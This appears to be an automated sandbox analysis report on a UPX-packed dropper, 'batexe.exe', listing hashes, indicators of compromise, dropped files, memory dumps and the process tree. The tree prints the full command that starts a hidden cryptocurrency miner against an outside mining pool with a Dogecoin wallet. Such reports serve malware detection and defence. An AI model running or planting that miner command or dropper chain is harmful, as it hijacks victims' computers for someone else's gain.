73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
296s
max time network
296s
platform
windows10-1703_x64
resource
win10-20240214-ja
resource tags

arch:x64arch:x86image:win10-20240214-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
18-02-2024 17:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
1604	b2e.exe
3952	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
3952	cpuminer-sse2.exe
3952	cpuminer-sse2.exe
3952	cpuminer-sse2.exe
3952	cpuminer-sse2.exe
3952	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/2900-5-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 2900 wrote to memory of 1604	2900	batexe.exe	72
PID 2900 wrote to memory of 1604	2900	batexe.exe	72
PID 2900 wrote to memory of 1604	2900	batexe.exe	72
PID 1604 wrote to memory of 212	1604	b2e.exe	73
PID 1604 wrote to memory of 212	1604	b2e.exe	73
PID 1604 wrote to memory of 212	1604	b2e.exe	73
PID 212 wrote to memory of 3952	212	cmd.exe	76
PID 212 wrote to memory of 3952	212	cmd.exe	76

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2900
- C:\Users\Admin\AppData\Local\Temp\F6C.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\F6C.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\F6C.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1604
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\14FA.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:212
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3952

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\14FA.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\F6C.tmp\b2e.exe

Filesize
6.7MB

MD5
150b47bee82a1a01673282b60ef5b8fe

SHA1
c265157d3fe1240e77c7fb078916fff7899acac9

SHA256
3ab8e1a72d55b2272a961631824c7169887f160442ed7ca39d8bc5f610b02a91

SHA512
35a9a9be19f3bdf62ca27c715b65413cb358dab336c3d7aa24019591f1dd1fb13be9618fa573d4a2196b2b5c34c38bfd4c2452d8c3f2c6c9403d0ac2ade6071f

Download Submit
C:\Users\Admin\AppData\Local\Temp\F6C.tmp\b2e.exe

Filesize
6.2MB

MD5
3895d468c971fc0e777c38eefb977764

SHA1
d2ce65cd94478bda13e72418cf85745bc0692553

SHA256
fbe733c6b15d866887417f3e614391b18f5bf19b20b65c3217ce574191334dfb

SHA512
a1fe8060b1c885ae7a573e27f5a1bc016090a66c32f903af8e9cca4a4244e169113006970aedd276a60236b502c766746133bc490c948ce49a44b5b507cb4a51

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
893KB

MD5
826631c25d4f4d5dbd84bafc357533e2

SHA1
876bc81e1faf066af636d2a57f9f00040c3a0b46

SHA256
47b6f864ecf14fb2d8c0d969f57ad6f1f5bfa438e0d7723c07e45e7adb4fbfb4

SHA512
e292e313621de90e80af869bee438e4b90444e2457f1efc739dcb67eda040f11a5bbfbfc09bede0ac2f54bb90d566eac3d576e2ed85b9df574e6a01a1bc1fb22

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
646KB

MD5
f33716467595fb8f96460b4d4569689c

SHA1
e40edc0bf0bb1a227ccb621c0fff62771d90a907

SHA256
2b42b0762f1ddc7bd7d5826a8c07eec1fe2b66991f8c6dd424114b6876457a95

SHA512
8a083c8c1e53423f39b2475763636451f62a842c19ed8fbf080162aeedec1c36f108c36ee2885e69dadcbe8100663e4128488a3e9f0bea2b6442c8fe795a184e

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
555KB

MD5
370f644f0a4a0c3c9f8f51f9ddd21619

SHA1
b6b58a681687a207d52cc78ab40c1ae7734a317f

SHA256
924db0f8b02ea34aa6fd550c4fad72b6e810e61860c7ae9171513e0385a55aad

SHA512
b5806caeac5d75f0767697ad553e59611f6306fb1d7d9573bda85bfd85382078ae68c572c021fb426805aeb752d865ddaaa9d0181ffcedafbd946e4ea0961a0f

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
371KB

MD5
d16f040a0c3a2b3a0c9979cf933e9442

SHA1
68fa03ff045170aa37778cbe65f086780f002ff9

SHA256
09cd98186de628f657164c17945239ffff65e4029ed8783279370dbbe30ce6fb

SHA512
ae4d8bf7b13bd88d9eae4bbd1ace4d1ffedc734d80904bcfecf74881a19b6b4e2d1ef51fcf19933211faa1a51e63613ce654f36e7b933cab303f2fb0e534a2d1

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
499KB

MD5
81c215c3d715a5be7a67a12cd2dc43e6

SHA1
68f72ca15a1a751fc1136c1e676df9af265415e6

SHA256
370b3e62b00a6d41890f4f48a1231fe21ae39116513178aa4bed988a41636b10

SHA512
d02dce3b11d805fb123120f1595b1a3564a5ca0e90cff8b585e8c38d15a6fb83d47c8d72726e08321b477320562a8ae5ce23c44599d28c36c88848033fe5e335

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
381KB

MD5
48ae60211d027a3906919f23211e77b2

SHA1
c432f20b3b1896fba7c7168c2782b7c275a3a3d3

SHA256
f858e28927825333c5b77d04109361fa28341e5439989026572b4d66e920ea0b

SHA512
0f53bbf9aa910e4961bc8a0361cd4e42d5e1b5f470682edb870748a1a5af3cedee996fb6d52513a80bd8f8d62d5ffe0e1c06a823f93f84aae555b0d511bdce79

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
652KB

MD5
b18f42add11f2892019b757588e4a463

SHA1
7913ec59a1741f9434db3e3b096388647508085b

SHA256
e3ba7d9a4074e8c37925968787227731e9a8732a8be81970f5f3436d7f5075e2

SHA512
ad892e5e65fb473f8e34a50eecda005f8f28aabb638ee36f1c1352b381c681d28a10f2c172197b897c42fe378c9f408f70102d63ba75cbbc04e09aee885b498e

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
553KB

MD5
34bf9176a12b2352707707b732fc4921

SHA1
f764f3436a6f830382a5453ff5ad163eae2a8cc3

SHA256
1ec9e824e998ace1b98ce1fa4380299cfe39a009ba36e0ca56b3ffa35408124e

SHA512
b9a1a323fe1672e32ddc74803975fccccfc169218deb6df6f78159d8ec7b6884bc25bef892546c8139426616b1c7bb3901cd2a7b4cf163b24002e17e992a801e

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
318KB

MD5
9fc91058ecc6690d3008eb595124c8ff

SHA1
fb99c5f3cb68e3f257ba57ad9075120a2cb63cc3

SHA256
fd813ac88fdce114fde75e6a6d5bbc774541ddce1f807472d1bfcca55815b5a0

SHA512
d5d78101200be5ef882357ef6c8a0ac856757560e5d1e8b42a0bf32ce37fb304ae3d711f698e47de6343b68a306e064426a45c580445ef1c7824201aa53e385c

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
393KB

MD5
3099222930174c62dd0e5ad33b07cbcf

SHA1
ed236049f4bac7995bd396d06aed3860864dd1f6

SHA256
46d174fcc7866ca841e7cc55a405123b0a09f6b682858675268fae85c277d988

SHA512
0a2a915a4901b9e50783dc66e6db7a9879c3be6d6747412cce2ee63d558575b48b975fd97f560b05fee38c815916c09bea46a01583d79158bc3be010cc071197

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
292KB

MD5
6fb5e266af0373db4a8f5192a76772bd

SHA1
4a3fc59b634e25358e31ef541ad9e7f47e83ad21

SHA256
62762f93043e9813d41996ec83adcda858b759ce943bdcf9e0fe8c68dcd684db

SHA512
ff993ae3f97db2e694b1c7b5a971a8f2e0ac15591366bf9d017313e3d82234efd13dbaced42243cdd522b545fd872bf0a3854d6c5cc918000c56f394fd093ae2

Download Submit
memory/1604-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1604-6-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2900-5-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/3952-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3952-43-0x0000000074E60000-0x0000000074EF8000-memory.dmp

Filesize
608KB

Download
memory/3952-42-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/3952-44-0x00000000010E0000-0x0000000002995000-memory.dmp

Filesize
24.7MB

Download
memory/3952-41-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/3952-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3952-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3952-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3952-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3952-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3952-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3952-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3952-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download